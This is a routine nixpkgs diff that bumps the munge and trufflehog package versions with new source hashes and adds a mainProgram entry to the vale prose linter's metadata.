--- a/pkgs/tools/security/munge/default.nix +++ b/pkgs/tools/security/munge/default.nix @@ -2,13 +2,13 @@ stdenv.mkDerivation rec { pname = "munge"; - version = "0.5.15"; + version = "0.5.16"; src = fetchFromGitHub { owner = "dun"; repo = "munge"; rev = "${pname}-${version}"; - sha256 = "sha256-Ot/oH/RdfPAzoi3P7EYkxS0Fr24KRWfBJxBEWRF0ctI="; + sha256 = "sha256-fv42RMUAP8Os33/iHXr70i5Pt2JWZK71DN5vFI3q7Ak="; }; strictDeps = true; diff --git a/pkgs/tools/security/trufflehog/default.nix b/pkgs/tools/security/trufflehog/default.nix index 5b6868fcc6c8..7486ce9bc099 100644 --- a/pkgs/tools/security/trufflehog/default.nix +++ b/pkgs/tools/security/trufflehog/default.nix @@ -7,16 +7,16 @@ buildGoModule rec { pname = "trufflehog"; - version = "3.69.0"; + version = "3.70.0"; src = fetchFromGitHub { owner = "trufflesecurity"; repo = "trufflehog"; rev = "refs/tags/v${version}"; - hash = "sha256-1O1iwZQdC4Vf/mGRauZwg6U52bF28IqCUw8Ugt3USFI="; + hash = "sha256-KcJhnev2j4Y7jlIZe2cUgkiJEz5V+oG69SURs5tXCVU="; }; - vendorHash = "sha256-c9CkQMTH2mRpKjlyV7lnNyKQYgPxEP9adHcSh9qsWYk="; + vendorHash = "sha256-oJ5aPffmBDCJ6cD2nG1Q5w+R6LV6oDf4v9hIWN9jNdc="; ldflags = [ "-s" diff --git a/pkgs/tools/text/vale/default.nix b/pkgs/tools/text/vale/default.nix index f5e02eef3924..cbc2893b1304 100644 --- a/pkgs/tools/text/vale/default.nix +++ b/pkgs/tools/text/vale/default.nix @@ -30,6 +30,7 @@ buildGoModule rec { description = "A syntax-aware linter for prose built with speed and extensibility in mind"; homepage = "https://vale.sh/"; changelog = "https://github.com/errata-ai/vale/releases/tag/v${version}"; + mainProgram = "vale"; license = licenses.mit; maintainers = [ maintainers.marsam ]; }; |